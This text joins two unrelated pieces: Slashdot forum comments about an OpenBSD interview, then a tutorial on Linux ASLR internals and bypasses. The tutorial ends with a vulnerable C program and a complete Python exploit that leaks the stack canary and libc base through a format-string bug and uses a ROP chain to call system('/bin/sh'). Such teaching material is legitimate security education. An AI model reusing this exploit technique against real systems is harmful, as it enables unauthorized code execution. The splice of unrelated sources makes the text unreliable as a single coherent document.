you for software, he isn't forcing you to listen, he isn't infringing on your on any aspect of your reality... unless you let him. But he doesnt follow his own advice (Score:3) In the answer to the first question Theo goes into detail about why software should be good, not just "good enough". However in answer to the 5th question "Kernel Design" he contradicts his own previous argument by saying "I dont think it makes any difference, as long as the system does what it is supposed to" Theo, throughout your responses, you have personally insulted the intelligence of the people who ask you questions. You have insulted the intelligence of the people who either use, pan to try, or know more than most of the dawdling masses about your distrobution. What I dont understand is why. If you could answer that, I would appreciate it. And if you could answer it without the typical belittling that is ever present throughout the answers to the questions asked before, I would appreciate it even more. Sincerely, CyberKnet --- Theo and Microkernels (Score:2) Set aside discussions about NT or OpenVMS, wouldn't a design like the HURD(I'm not saying MK's are better or that I like theme more the monolithic systems) at least be a reasonyble approach to more system security. If I understand correctly HURD and probably other Microkernels can run at lot more stuff in userland and that could at least be a advantage when you try to build a very secure system. If Theo is really posting on Charitable Donations (Score:2) From a different point of view (for Canadians, at least), you can look at the tax break for "charitable donations" as a way of directing government money to the organizations you would like supported. From my point of view, a $100 chariable donation is really only an ~$80 donation from me, plus ~$20 of the government's money that I want directed to organizations I feel are important. That's not to say that (non|not-for)-profit is the way to go for OpenBSD, but it may convert a few more anti-charitable donations people to support organizations they feel are important. I only support to those organizations that I feel are important (whether they get me a tax deduction or not), since you don't actually get more out of the tax deduction than you put into the donation. andrew Working with microkernels (Score:5) Forks are Good! (Score:5) I think he is totally correct with this point. The point of a codefork is that you end up with two variants, only one of which, in the long term, will survive (usually). It leads to a sort of Darwinian survival of the fittest, and improves the overall code base in the long term as well as giving people options - they can mould their distro to their needs. I have often wondered why the Linux people are so scared of code forks also - could it be because they look back at the Unix wars of the eighties and shudder? This would suggest that the BSD'ers have not inherited the UNIX philosophy to the same degree as the Linux community - that may give them more freedom. I am not suggesting that forks be encouraged, though, rather that people stop whining when they occur, and recognise them as an opportunity. Perhaps forks will not be a good thing for Linux in ten years or so, but given that it is presently a sort of 'primordial ooze', and very creative, I do not think it is bad thing for the moment. KTB:Lover, Poet, Artiste, Aesthete, Programmer. Re:But he doesnt follow his own advice (Score:2) I use OpenBSD personally. It makes a great firewall. But other than prevent external access to internal services, there's not much I can do to prevent daemons I run from being compromised if they haven't been through the vigourous code audit that the rest of OpenBSD has been through. I asked my question as an OpenBSD user, not as a Linux user. I wouldn't dream of using Linux as a firewall when OpenBSD is open to me. But at the same time, I'm painfully aware that OpenBSD only goes so far. I do want to see similar auditing efforts applied to the third party servers, in particular, as are currently applied to OpenBSD. If I had time, I'd start the ball rolling myself... -- Re:But he doesnt follow his own advice (Score:2) I'd like you to point at anything I've said that even remotely resembles that point of view. Ironically, that point-of-view actually relatively close to the Unix modus-operandi, tools like BIND, sendmail, etc, which were generated outside of the OpenBSD group, have been subjected to the same standards of auditing as the rest of the operating system. Perhaps you'd like to review your history of Unix - Linux wasn't the first Unix, and it was Unix, not Linux, that set in place most of the modes of operation we see in Unixen today, from source-available software to bluring the line between the OS and third party tools when it comes to system software. And I guess BSD's source is the responsibility of the University of B. to get sorted out. What tosh. The OpenBSD team currently maintains a ports tree. It would be nice to have a seperate tree, or a categorisation within that tree, of ports that have gone through the same rigorous standards of auditing that the source code to the operating system has done, for some critical tools. Asking the OpenBSD team if they could organise this, as they already organise a ports tree, is perfectly reasonable. Nobody other than you seems to regard this as an unfair request. Given Theo's reputation, I wouldn't have expected a non-candid answer if he had felt the question was unfair. If he feels the question is unreasonable or silly, he certainly isn't showing it. The reason why people like me use OpenBSD is because it's been through that audit. When we install critical third party tools like INN, we know that the hard work of the OpenBSD developers to make it easy to secure a box has just been compromised. If you think we should just wait on the original third-party developers to announce that their programs have been "secured", you don't have a clue why we're running OpenBSD in the first place. -- Where the money goes (Score:3) I find the ideas that I get from beer are generally along the lines of "I think I'll have another beer". TdR is obviously made of sterner stuff than I. Or it could just be that Canada has the 2nd worst beer in the world (after the US). Re:Mr.Sparkler (Score:3)
https://slashdot.org/story/00/12/11/1455210/theo-de-raadt-responds
CC-MAIN-2016-30
refinedweb
14,779
71.65
Preface Hey there! I’m finally ready to present you the third installment of the series exploit mitigation techniques. Today I want to talk about Address Space Layout Randomization or ASLR in short. Format wise the article will be structured the following way: - Introduction to the technique - Current implementation details - Weaknesses - PoC on how to bypass ASLR - Conclusion Disclaimer: The following is the result of a self study and might contain faulty information. If you find any let me know. Thanks! Requirements - A bunch of spare minutes - A basic understanding of what causes memory corruptions/information leaks - The will to ask or look up unknown terms yourself - ASM/C knowledge - x64 exploitation basics - return oriented programming basics - knowledge from my previous 2 installments Address Space Layout Randomization Basic Design With DEP and canaries in place adversaries could not easily execute arbitrary inserted code in memory anymore. Memory pages, where buffer contents reside are marked non executable and the canary value prevents a simple overwrite of any return statement within a function. A problem that was still present and exploited was that executed processes had a static address mapping. That made it easy to find addresses of library functions or the run binary itself in memory. Ultimately leading to a successful arc injection attack without much effort. As a result address space layout randomization (ASLR) emerged to bring another security parameter to the table to deny adversaries easily guessable memory locations. The idea is to place objects randomly in the virtual address space causing a non trivial problem to solve for an attacker, which is the ability to execute placed malicious code at will. A very tl;dr version of ASLR would be that a random offset value is added to the base address during process creation to independently change all three areas of a process’s address space, consisting of an executable, mapped and stacked area. In short the most exploited areas: the stack, the heap and the libraries are mapped randomly in memory to prevent abuse. Linux offers three different ASLR modes which are displayed below: Linux ASLR can be configured through setting a value in /proc/sys/kernel/randomize_va_space. Three types of flags are available 0 – No randomization. Everything is static. 1 – Conservative randomization. Shared libraries, stack, mmap(), VDSO and heap are randomized. 2 – Full randomization. In addition to elements listed in the previous point, memory managed through brk() is also randomized. Note: “VDSO” (virtual dynamic shared object) is a small shared library that the kernel automatically maps into the address space of all user-space applications. Note 2: mmap() creates a new mapping in the virtual address space of the calling process. Note 3: brk() and sbrk() change the location of the program break, which defines the end of the process’s data segment. Beyond that Linux systems offer position independent executable (PIE) binaries, which hardens ASLR even more. PIE is an additional address space randomization technique that compiles and links executables to be fully position independent. The result is that binaries compiled that way have their code segment, their global offset table (GOT) and their procedure linkage table (PLT) placed at random locations within virtual memory each time the application is executed as well, leaving no more static locations. Here you can see a simple overview on how a process can behave in memory after three successive executions PIE detour Let’s talk about total position independency for a moment! To make a PIE binary work correctly we have to consider that there needs to be a way for the loader to resolve symbols at runtime. As the address of the symbol in memory is not a part of the main binary anymore the loader adds a level of indirection in the procedure linkage table (PLT). Instead of calling, lets say puts() directly, the .plt section of the binary contains a special entry that points to the loader. The loader then has to resolve the actual address of the function. Once it has done that it updates an entry in the Global Offset Table (GOT). Subsequent calls to the same routine are made by jumps from the GOT entry. Trivia: The Linux command line program file detects PIE files as dynamic shared objects (DSO) instead of the usual ELF file. PIE must be viewed as an addition to ASLR, since it would not do any good if there was no ASLR in the first place. That said since a PIE binary and all of its dependencies are loaded into random locations within virtual memory each time the application is executed return oriented programming (ROP) attacks are much more difficult to execute reliably. __ Okay back to the main topic about ASLR! Linux based operating systems got a default ASLR implementation since kernel version 2.6.12, which was released in 2005, but got a set of patches to increase security by the PaX project later on. But already in 2001 PaX published the first design and implementation of ASLR. Only years later in 2014 with the release of kernel version 3.14 the possibility to enable kernel address space layout randomization (kASLR) was given, which has the same goal as ASLR, only with the idea in mind to randomize the kernel code location in memory when the system boots. Since kernel version 4.12 kASLR is enabled by default. The effectiveness of kASLR has been questioned quite a few times already and a variety of drawbacks are publicly known as of today. Non the less it adds a further hardening to the system and should not be dismissed that easily. I have added some references at the end for anyone interested in kASLR exploitation :) . Side note: Windows machines on the other hand have ASLR and kASLR enabled by default since the launch of Windows Vista in 2006 and work similar, but due to the differences in system design nuances of differences exist and cannot be covered in this paper but looked up in a detailed analysis issued by the CERT Institute. This makes clear that (k)ASLR and PIE solely rely on keeping the altered memory space secret to be effective. ASLR implementation - Diving into the Linux kernel What would a research article look like if we didn’t dig into the implementations ;) . The kernel is huge and truely a work of geniuses, as a result I will and can just scratch on the surface of the implementations for this article. This enables us to focus on the relevant parts and keep the article a reasonable length. Again remember, this will be all Linux specific, so please keep that in mind :) . Note: We will mostly take a look at the current x86 implementation. Comparing the following to the other implementations is another topic! Randomizing a memory address So first of all how does the system get a randomized memory address in the available/valid address range? Luckily the kernel code is open source and (mostly :D ) documented! Let’s take a look at the /drivers/char/random.c kernel file that exactly handles our needs: /** * randomize_page - Generate a random, page aligned address * @start: The smallest acceptable address the caller will take. * @range: The size of the area, starting at @start, within which the * random address must fall. * * If @start + @range would overflow, @range is capped. * * NOTE: Historical use of randomize_range, which this replaces, presumed that * @start was already page aligned. We now align it regardless. * * Return: A page aligned address within [start, start + range). On error, * @start is returned. */ unsigned long randomize_page(unsigned long start, unsigned long range) { if (!PAGE_ALIGNED(start)) { range -= PAGE_ALIGN(start) - start; start = PAGE_ALIGN(start); } if (start > ULONG_MAX - range) range = ULONG_MAX - start; range >>= PAGE_SHIFT; if (range == 0) return start; return start + (get_random_long() % range << PAGE_SHIFT); } Essentially what happens here is that in order to generate a random address randomize_page() takes two arguments: a start address and a range argument. After some initital page alignment magic what it ultimately comes down to is that it uses the get_random_long() function and applies a modulo to get a number between the suppiled ‘start’ address within the offered ‘range’ value. ELF binary loading If the kernel is instructed to load an ELF binary a routine called load_elf_binary() is invoked. This one is located in /fs/binfmt_elf.c. Here a multitude of things happen. Lets take a quick look at these parts, which are responsible for the initialization of pointers memory, like the code, data and stack section. static int load_elf_binary(struct linux_binprm *bprm) { [...] if (!(current->personality & ADDR_NO_RANDOMIZE) && randomize_va_space) current->flags |= PF_RANDOMIZE; [...] /* Do this so that we can load the interpreter, if need be. We will change some of these later */ retval = setup_arg_pages(bprm, randomize_stack_top(STACK_TOP), executable_stack); [...] /* N.B. passed_fileno might not be initialized? */ current->mm->end_code = end_code; current->mm->start_code = start_code; current->mm->start_data = start_data; current->mm->end_data = end_data; current->mm->start_stack = bprm->p; if ((current->flags & PF_RANDOMIZE) && (randomize_va_space > 1)) { current->mm->brk = current->mm->start_brk = arch_randomize_brk(current->mm); #ifdef compat_brk_randomized current->brk_randomized = 1; We can see that if the randomize_va_space variable is higher than 1, and the PF_RANDOMIZE flag is set, the base address of brk() is randomized with the arch_randomize_brk() function. Furthermore the top of the stack gets some randomization treatment as well! brk() randomization Recall: brk() changes. The x86 implementation of the randomize_brk() function is located in /arch/x86/kernel/process.c: unsigned long arch_randomize_brk(struct mm_struct *mm) { return randomize_page(mm->brk, 0x02000000); } It randomizes the given address space by providing the current address with an additional range argument of 0x02000000 using the former randomize_page() routine! Stack randomization The stack randomization is started in the /fs/binfmt_elf.c as well. In particular in the load_elf_binary() we talked above already! static int load_elf_binary(struct linux_binprm *bprm) { [...] /* Do this so that we can load the interpreter, if need be. We will change some of these later */ retval = setup_arg_pages(bprm, randomize_stack_top(STACK_TOP), executable_stack); [...] In the end we have 2 components we have to take a look at here. First the setup_arg_pages() and then randomize_stack_top(). Let’s start with the latter, since it’s needed as a function argument for setup_arg_pages(): [...] #ifndef STACK_RND_MASK #define STACK_RND_MASK (0x7ff >> (PAGE_SHIFT - 12)) /* 8MB of VA */ #endif static unsigned long randomize_stack_top(unsigned long stack_top) { unsigned long random_variable = 0; if (current->flags & PF_RANDOMIZE) { random_variable = get_random_long(); random_variable &= STACK_RND_MASK; random_variable <<= PAGE_SHIFT; } #ifdef CONFIG_STACK_GROWSUP return PAGE_ALIGN(stack_top) + random_variable; #else return PAGE_ALIGN(stack_top) - random_variable; #endif [...] } It takes the top of the stack as an address and returns a page aligned version of that address +/- some random variable. This random variable is obtained by calling get_random_long() and doing once again some further randomization by doing a bitwise AND (&=) assignment with a defined STACK_RND_MASK and an additional left shift AND («=) assignment with a variable PAGE_SHIFT. Okay that was not all for the stack as we outlined just earlier.. The actual stack randomization will take place in /fs/exec.c and more specifically in the setup_arg_pages() routine: [...] /* * Finalizes the stack vm_area_struct. The flags and permissions are updated, * the stack is optionally relocated, and some extra space is added. */ int setup_arg_pages(struct linux_binprm *bprm, unsigned long stack_top, int executable_stack) [...] #ifdef CONFIG_STACK_GROWSUP /* Limit stack size */ stack_base = rlimit_max(RLIMIT_STACK); if (stack_base > STACK_SIZE_MAX) stack_base = STACK_SIZE_MAX; /* Add space for stack randomization. */ stack_base += (STACK_RND_MASK << PAGE_SHIFT); /* Make sure we didn't let the argument array grow too large. */ if (vma->vm_end - vma->vm_start > stack_base) return -ENOMEM; stack_base = PAGE_ALIGN(stack_top - stack_base); stack_shift = vma->vm_start - stack_base; mm->arg_start = bprm->p - stack_shift; bprm->p = vma->vm_end - stack_shift; ; mm->arg_start = bprm->p; #endif [...] If the stack segment does not grow upwards, the kernel will use arch_align_stack() to pass the stack top address, which was an argument of the current function we are looking at. Then it will align the returned value and continue further stack setup. The alignment procedure again can be found back in /arch/x86/kernel/process.c unsigned long arch_align_stack(unsigned long sp) { if (!(current->personality & ADDR_NO_RANDOMIZE) && randomize_va_space) sp -= get_random_int() % 8192; return sp & ~0xf; } If the currently executed task has no ADDR_NO_RANDOMIZE flag set and furthermore the randomize_va_space has a value besides 0 the get_random_int() function is invoked to perform the stack randomization. This happens in form of retrieving a random int() value and following up by a modulo (%) operation with 8192. After decrementing the stack pointer (sp) with the random number in case of an ASLR supported task, the talked about alignment takes place. On the x86 architecture it will align it by masking it with 0xfffffff0. mmap() randomization Recall: mmap() creates a new mapping in the virtual address space of the calling process. It takes two arguments: a start address for the new mapping and the length of the mapping. After performing some essential tests to avoid collisions with the randomized virtual address space of the stack the randomization routine for mmap() is started. We can find the essential pieces in /arch/x86/mm/mmap.c: [...] static unsigned long mmap_base(unsigned long rnd, unsigned long task_size) { unsigned long gap = rlimit(RLIMIT_STACK); unsigned long pad = stack_maxrandom_size(task_size) + stack_guard_gap; unsigned long gap_min, gap_max; /* Values close to RLIM_INFINITY can overflow. */ if (gap + pad > gap) gap += pad; /* * Top of mmap area (just below the process stack). * Leave an at least ~128 MB hole with possible stack randomization. */ gap_min = SIZE_128M; gap_max = (task_size / 6) * 5; if (gap < gap_min) gap = gap_min; else if (gap > gap_max) gap = gap_max; return PAGE_ALIGN(task_size - gap - rnd); [...] } First some calculation of the maximum randomized address via stack_maxrandom_size() is done. We can see the routine itself already gets called with a unsigned long rnd parameter which is used to return a page aligned memory area, where the rnd is used as a factor. The rnd variable is calculated and retrived beforehand from the arch_rnd() routine, which looks like: static unsigned long arch_rnd(unsigned int rndbits) { if (!(current->flags & PF_RANDOMIZE)) return 0; return (get_random_long() & ((1UL << rndbits) - 1)) << PAGE_SHIFT; } After checking if randomization shall take places the routine consist of various metrics. The rndbits part depends on whether we have a 32-bit or 64-bit application. Note: 1UL represents am unsigned long int with a value of 1 represented at the bit level as: 00000000000000000000000000000001 In the end we have the value 1 as an unsigned long int datatype left shifted by the by the rndbits value. This value is substracted by 1. Next an AND operation on the binary level with the prior result is taking place. This lastly gets left shifted by the value residing in PAGE_SHIFT. So much for a brief overview of the linux kernel internals for now. Since the kernel is an ever evolving structure, things might be different in the near future, but the basic routines will most likely stay the same. Let’s continue since we still have a lot more to talk about! Next up will be the talk about known ASLR limitations. Flashback: Data Execution Prevention Recall: mprotect() changes protection for the calling process’s memory page(s) containing any part of the address range in the interval Remember my first article about data execution prevention and non executable stacks :) ? When skimming through the kernel code I found the code snippet responsible for making the stack (not) executable. It was right below the stack randomization part in /fs/exec.c : [...] vm_flags = VM_STACK_FLAGS; /* * Adjust stack execute permissions; explicitly enable for * EXSTACK_ENABLE_X, disable for EXSTACK_DISABLE_X and leave alone * (arch default) otherwise. */ if (unlikely(executable_stack == EXSTACK_ENABLE_X)) vm_flags |= VM_EXEC; else if (executable_stack == EXSTACK_DISABLE_X) vm_flags &= ~VM_EXEC; vm_flags |= mm->def_flags; vm_flags |= VM_STACK_INCOMPLETE_SETUP; ret = mprotect_fixup(vma, &prev, vma->vm_start, vma->vm_end, vm_flags); [...] For those of you who are still interested: It uses a modified mprotect() routine which can be found in /mm/mprotect.c. Limitations As good as ASLR sounds on paper it has multiple design flaws especially on 32 bit systems. Moreover multiple ways around ASLR have been found, which enables adversaries to still exploit applications only with a medium increase in workload in the exploit building phase. One of the most critical constraints on 32 bit systems is the fragmentation problem that limits the security design a lot. Objects are randomly mapped in memory, causing “chunks” of free memory in between mapped objects in the address space, which can also be seen in the ASLR graphics at the beginning. Eventually no big enough memory chunk to hold a new process can be found anymore. This is less of a problem of 64 bit systems due to increased size in virtual memory address space. ASLR relies on randomness applied to objects mapped in memory to be effective. Nevertheless keeping a relative distance to each object in memory is maintained to give growable objects like the stack or heap more freedom, while avoiding fragmentation. This method introduces a major flaw due to too low entropy values. On average a 16 bit entropy is present on 32 bit systems, which can be brute forced within minutes at most on current systems. 64 bit systems have around 40 bit available for randomization, from which only around 28 bit can be effectively used for entropy measures, making them slightly more secure. This only matters as long as one cannot guess some bits due to information leaks or similar tactics. Furthermore it was observed that the random generator used by ASLR does not produce/was not producing a truly uniform mapping for all libraries on both architectures, so focusing on more likely addresses to hold mapped objects decreases the cost for a brute force attack even further. Last but not least the fact that libraries are mapped next to each other in memory can be used for correlation attacks, since knowing one library address leaks the positions of all surrounding ones as well. That enabled an exploit tactic called Offset2lib. There a buffer overflow is used to de-randomize an applications address space and fully abuse this. Besides the aforementioned facts already known return to known code attacks like ret2libc or return oriented programming work as good as ever if one can find the right addresses to use. Additionally for kASLR you have to note that gaining a certain pointer, which provides any kind of information about the process allocation in memory can be used to break this technique, since the kernel cannot change its distribution in memory throughout its operating time. This means that until the next system reboot a new randomization of kernel code in memory will not and more importantly cannot be performed! This fact makes kASLR weaker than its big brother ASLR, since the latter randomizes for every new spawning process. Note: binaries compiled without the PIE option are vulnerable even with a fully enabled ASLR present. This is the case, since an attacker could leverage the .text, .plt and .got segment within an executable. That said a valid attack type in this case is return2PLT/GOT or simply ROP! Defeating ASLR, Stack Canaries and DEP as well as bypassing FULL RELRO on x64 Since ASLR does not bring anything new or fancy to the table and just randomizes the process address space of a given binary I thought we could just jump into x64 exploitation as well. The vulnerable binary So let’s get right into it: The vulnerable program did not change much from last time. It was already build around being exploited with ASLR in mind ;) Here is the code again: #include <stdio.h> #include <string.h> #define STDIN 0 void itIsJustASmallLeakSir() { char buf[512]; scanf("%s", buf); printf(buf); } void trustMeIAmAnEngineer() { char buf[1024]; read(STDIN, buf, 2048); } int main(int argc, char* argv[]) { printf("Welcome to how 2 not write Code 101"); setbuf(stdout, NULL); printf("$> "); itIsJustASmallLeakSir(); printf("\n"); printf("$> "); trustMeIAmAnEngineer(); printf("\nI reached the end!\n"); return 0; } There are two obvious vulnerabilities at hand. One being a format string vulnerability in the itIsJustASmallLeakSir() function. We do have full control of the buffer contents and our given input is printed without any checks. The other one being a buffer overflow possibility in the trustMeIAmAnEngineer() function. Here we can read in 2048 bytes into a buffer which just can hold half of that. Let’s compile it with gcc -o vuln_x64 vuln.c -Wl,-z,relro,-z,now. Also let’s enable full ASLR: echo 2 > /proc/sys/kernel/randomize_va_space This results in a binary with the following exploit mitigations in place: $ checksec vuln_x64 [*] '/home/lab/Git/RE_binaries/ASLR/binaries/vuln_x64' Arch: amd64-64-little RELRO: FULL RELRO Stack: Canary found NX: NX enabled PIE: No PIE (0x400000) The assembly did not change too much either obviously. For the sake of completeness let’s take a look again: main(): gdb-peda$ disassemble main Dump of assembler code for function main: 0x0000000000400813 <+0>: push rbp 0x0000000000400814 <+1>: mov rbp,rsp 0x0000000000400817 <+4>: sub rsp,0x10 0x000000000040081b <+8>: mov DWORD PTR [rbp-0x4],edi 0x000000000040081e <+11>: mov QWORD PTR [rbp-0x10],rsi 0x0000000000400822 <+15>: mov edi,0x400930 ; string to be printed 0x0000000000400827 <+20>: mov eax,0x0 0x000000000040082c <+25>: call 0x400620 <[email protected]> ; Welcome message is printed 0x0000000000400831 <+30>: mov rax,QWORD PTR [rip+0x200830] # 0x601068 <[email protected]@GLIBC_2.2.5> 0x0000000000400838 <+37>: mov esi,0x0 0x000000000040083d <+42>: mov rdi,rax 0x0000000000400840 <+45>: call 0x400610 <[email protected]> 0x0000000000400845 <+50>: mov edi,0x400954 ; string to be printed 0x000000000040084a <+55>: mov eax,0x0 0x000000000040084f <+60>: call 0x400620 <[email protected]> ; "$> " 0x0000000000400854 <+65>: mov eax,0x0 0x0000000000400859 <+70>: call 0x400766 <itIsJustASmallLeakSir> ; function call 0x000000000040085e <+75>: mov edi,0xa ; string to be printed "\n" 0x0000000000400863 <+80>: call 0x4005e0 <[email protected]> ; "\n" 0x0000000000400868 <+85>: mov edi,0x400954 ; string to be printed 0x000000000040086d <+90>: mov eax,0x0 0x0000000000400872 <+95>: call 0x400620 <[email protected]> ; "$> " 0x0000000000400877 <+100>: mov eax,0x0 0x000000000040087c <+105>: call 0x4007c4 <trustMeIAmAnEngineer> ; function call 0x0000000000400881 <+110>: mov edi,0x400958 ; string to be printed 0x0000000000400886 <+115>: call 0x4005f0 <[email protected]> ; "\nI reached the end!\n" 0x000000000040088b <+120>: mov eax,0x0 0x0000000000400890 <+125>: leave 0x0000000000400891 <+126>: ret End of assembler dump. itIsJustASmallLeakSir() next. gdb-peda$ disassemble itIsJustASmallLeakSir Dump of assembler code for function itIsJustASmallLeakSir: 0x0000000000400766 <+0>: push rbp 0x0000000000400767 <+1>: mov rbp,rsp 0x000000000040076a <+4>: sub rsp,0x210 0x0000000000400771 <+11>: mov rax,QWORD PTR fs:0x28 ; stack canary right here 0x000000000040077a <+20>: mov QWORD PTR [rbp-0x8],rax 0x000000000040077e <+24>: xor eax,eax 0x0000000000400780 <+26>: lea rax,[rbp-0x210] ; stack setup 0x0000000000400787 <+33>: mov rsi,rax 0x000000000040078a <+36>: mov edi,0x400928 0x000000000040078f <+41>: mov eax,0x0 0x0000000000400794 <+46>: call 0x400650 <[email protected]> ; user input is read 0x0000000000400799 <+51>: lea rax,[rbp-0x210] 0x00000000004007a0 <+58>: mov rdi,rax ; user input is copied to rdi for printing 0x00000000004007a3 <+61>: mov eax,0x0 0x00000000004007a8 <+66>: call 0x400620 <[email protected]> ; buf contents are printed 0x00000000004007ad <+71>: nop 0x00000000004007ae <+72>: mov rax,QWORD PTR [rbp-0x8] ; stack canary check routine starts 0x00000000004007b2 <+76>: xor rax,QWORD PTR fs:0x28 0x00000000004007bb <+85>: je 0x4007c2 <itIsJustASmallLeakSir+92> 0x00000000004007bd <+87>: call 0x400600 <[email protected]> ; stack canary check failure 0x00000000004007c2 <+92>: leave 0x00000000004007c3 <+93>: ret ; return to main End of assembler dump. Lastly we take a look at trustMeIAmAnEngineer() gdb-peda$ disassemble trustMeIAmAnEngineer Dump of assembler code for function trustMeIAmAnEngineer: 0x00000000004007c4 <+0>: push rbp 0x00000000004007c5 <+1>: mov rbp,rsp 0x00000000004007c8 <+4>: sub rsp,0x410 0x00000000004007cf <+11>: mov rax,QWORD PTR fs:0x28 ; stack canary right here 0x00000000004007d8 <+20>: mov QWORD PTR [rbp-0x8],rax 0x00000000004007dc <+24>: xor eax,eax 0x00000000004007de <+26>: lea rax,[rbp-0x410] ; stack setup 0x00000000004007e5 <+33>: mov edx,0x800 0x00000000004007ea <+38>: mov rsi,rax 0x00000000004007ed <+41>: mov edi,0x0 0x00000000004007f2 <+46>: mov eax,0x0 0x00000000004007f7 <+51>: call 0x400630 <[email protected]> ; user input is read 0x00000000004007fc <+56>: nop 0x00000000004007fd <+57>: mov rax,QWORD PTR [rbp-0x8] ; stack canary check routine starts 0x0000000000400801 <+61>: xor rax,QWORD PTR fs:0x28 0x000000000040080a <+70>: je 0x400811 <trustMeIAmAnEngineer+77> 0x000000000040080c <+72>: call 0x400600 <[email protected]> ; stack canary check failure 0x0000000000400811 <+77>: leave 0x0000000000400812 <+78>: ret ; return to main End of assembler dump. gdb-peda$ As you can see, compared to last time, nothing much changed, except that it is a x64 binary this time around. All other parts should be known by now! 64-bit exploitation crash course Let’s do a really short introduction to x64 exploitation. My last two articles only covered x86 PoCs so let’s step up the game a bit further. Not too much will change, but let’s get everyone roughly on the same level before continuing. Registers In x86 we have 8 general purpose registers eax, ebx, ecx, edx, ebp, esp, esi, edi. On x64 these got extended to 64-bits ( prefix got changed from ‘e’ to ‘r’ ) and 8 other registers r8, r9, r10, r11, r12, r13, r14, r15 got added. Function arguments According to the Application Binary Interface (ABI), the first 6 integer or pointer arguments to a function are passed in registers. The first argument is placed in rdi, the second in rsi, the third in rdx, and then rcx, r8 and r9. Only the 7th argument and onwards are passed on the stack! r10 is used as a static chain pointer in case of nested functions. Extra: Return Oriented Programming (ROP) primer The basic idea behind return oriented programming is that you chain together small ‘gadgets’. A gadget is a short instruction sequence always ending with some kind of control flow manipulation to invoke the next gadget in the chain. Most of the times this is a simple ret. Once we execute a ret, the address of the next gadget off the stack is popped and control flow jumps to that address. In particular, ROP is useful for circumventing Address Space Layout Randomization and DEP to gain e.g. arbitrary code execution of some form. Note: If you want to get even more familiar with ROP check the challenge section of the forum. Multiple writeups of different complexity are waiting to be found. We can find gadgets in numerous ways. The easiest way might be to use one of the already existing tools like ropper. For our binary above the shortened output looks like: $ ropper2 --file ./vuln_x64 [INFO] Load gadgets from cache [LOAD] loading... 100% [LOAD] removing double gadgets... 100% Gadgets ======= 0x00000000004006c2: adc byte ptr [rax], ah; jmp rax; 0x000000000040090f: add bl, dh; ret; 0x0000000000400754: add byte ptr [rax - 0x7b], cl; sal byte ptr [rcx + rsi*8 + 0x55], 0x48; mov ebp, esp; call rax; 0x000000000040090d: add byte ptr [rax], al; add bl, dh; ret; 0x0000000000400752: add byte ptr [rax], al; add byte ptr [rax - 0x7b], cl; sal byte ptr [rcx + rsi*8 + 0x55], 0x48; mov ebp, esp; call rax; 0x000000000040090b: add byte ptr [rax], al; add byte ptr [rax], al; add bl, dh; ret; [...] 0x0000000000400912: add byte ptr [rax], al; sub rsp, 8; add rsp, 8; ret; 0x000000000040088e: add byte ptr [rax], al; leave; ret; 0x000000000040088f: add cl, cl; ret; 0x0000000000400734: add eax, 0x200936; add ebx, esi; ret; 0x000000000040080b: add eax, 0xfffdefe8; dec ecx; ret; [...] 0x00000000004005bd: add rsp, 8; ret; 0x0000000000400737: and byte ptr [rax], al; add ebx, esi; ret; 0x0000000000400886: call 0x5f0; mov eax, 0; leave; ret; 0x00000000004007bd: call 0x600; leave; ret; [...] 0x00000000004006d0: pop rbp; ret; 0x0000000000400903: pop rdi; ret; 0x0000000000400901: pop rsi; pop r15; ret; 0x00000000004008fd: pop rsp; pop r13; pop r14; pop r15; ret; 0x000000000040075a: push rbp; mov rbp, rsp; call rax; 0x0000000000400757: sal byte ptr [rcx + rsi*8 + 0x55], 0x48; mov ebp, esp; call rax; 0x0000000000400915: sub esp, 8; add rsp, 8; ret; 0x0000000000400914: sub rsp, 8; add rsp, 8; ret; 0x00000000004006ca: test byte ptr [rax], al; add byte ptr [rax], al; add byte ptr [rax], al; pop rbp; ret; 0x0000000000400759: int1; push rbp; mov rbp, rsp; call rax; 0x00000000004007c2: leave; ret; 0x00000000004005c1: ret; 63 gadgets found You can see that in our small binary over 60 unique gadgets are already present. Now all that’s left is chaining the right ones together ;) . In our case this won’t be as complicated, but depending on the binary you want to exploit this task can be a real hassle! The exploit #!/usr/bin/env python2 import argparse from pwn import * from pwnlib import * context.binary = ELF('./binaries/vuln_x64') context.log_level = 'DEBUG' libc = ELF('/lib/x86_64-linux-gnu/libc-2.23.so') pop_rdi_ret_gadget = 0x0000000000400903 def prepend_0x_to_hex_value(value): full_hex = '0x' + value return full_hex def cast_hex_to_int(hex_value): return int(hex_value, 16) def get_libc_base_address(leak_dump): random_libc_address = leak_dump.split('.')[1] random_libc_address_with_0x_prepended = prepend_0x_to_hex_value(random_libc_address) print '[*] leaked position within libc is at %s' % random_libc_address_with_0x_prepended libc_to_int = cast_hex_to_int(random_libc_address_with_0x_prepended) libc_base = hex(libc_to_int - 0x3c6790) # offset found through debugging print "[=>] That puts the libc base address at %s" % libc_base return cast_hex_to_int(libc_base) def get_canary_value(leak_dump): canary_address = leak_dump.split('.')[70] full_canary_value = prepend_0x_to_hex_value(canary_address) print '[+] Canary value is: %s' % full_canary_value canary_to_int = cast_hex_to_int(full_canary_value) return canary_to_int def leak_all_the_things(): payload = '' payload += '%llx.'*71 return payload def get_system_in_glibc(libc_base): print("[+] [email protected] has offset: {}".format(hex(libc.symbols['system']))) system_call = libc_base + libc.symbols['system'] print("[+] This puts the system call to {}".format(hex(system_call))) return system_call def get_bin_sh_in_glibc(libc_base): bin_sh = int(libc.search("/bin/sh").next()) print("[+] /bin/sh located @ offset {}".format(hex(bin_sh))) shell_addr = libc_base + bin_sh print("[+] This puts the shell to {}".format(hex(shell_addr))) return shell_addr def get_cyclic_pattern(length): pattern = cyclic(length) return pattern def create_payload(canary, system, shell): junk_pattern = get_cyclic_pattern(1032) payload = '' payload += junk_pattern # junk pattern to fill buffer payload += p64(canary) # place canary at the right position payload += 'AAAAAAAA' # overwrite RBP with some junk payload += p64(pop_rdi_ret_gadget) # overwrite RIP with the address of our ROP gadget payload += p64(shell) # pointer to /bin/sh in libc payload += p64(system) # [email protected] return payload def main(): parser = argparse.ArgumentParser(description='pwnage') parser.add_argument('--dbg', '-d', action='store_true') args = parser.parse_args() exe = './binaries/vuln_x64' format_string_leak = leak_all_the_things() if args.dbg: r = gdb.debug([exe], gdbscript=""" b *trustMeIAmAnEngineer+56 continue """) else: r = process([exe]) r.recvuntil("$> ") r.sendline(format_string_leak) leak = r.recvline() print '[+] Format string leak:\n [%s]\n' % leak.rsplit("\n")[0] libc_base = get_libc_base_address(leak) system_call = get_system_in_glibc(libc_base) bin_sh = get_bin_sh_in_glibc(libc_base) canary = get_canary_value(leak) payload = create_payload(canary, system_call, bin_sh) r.recvuntil("$> ") r.sendline(payload) r.interactive() if __name__ == '__main__': main() 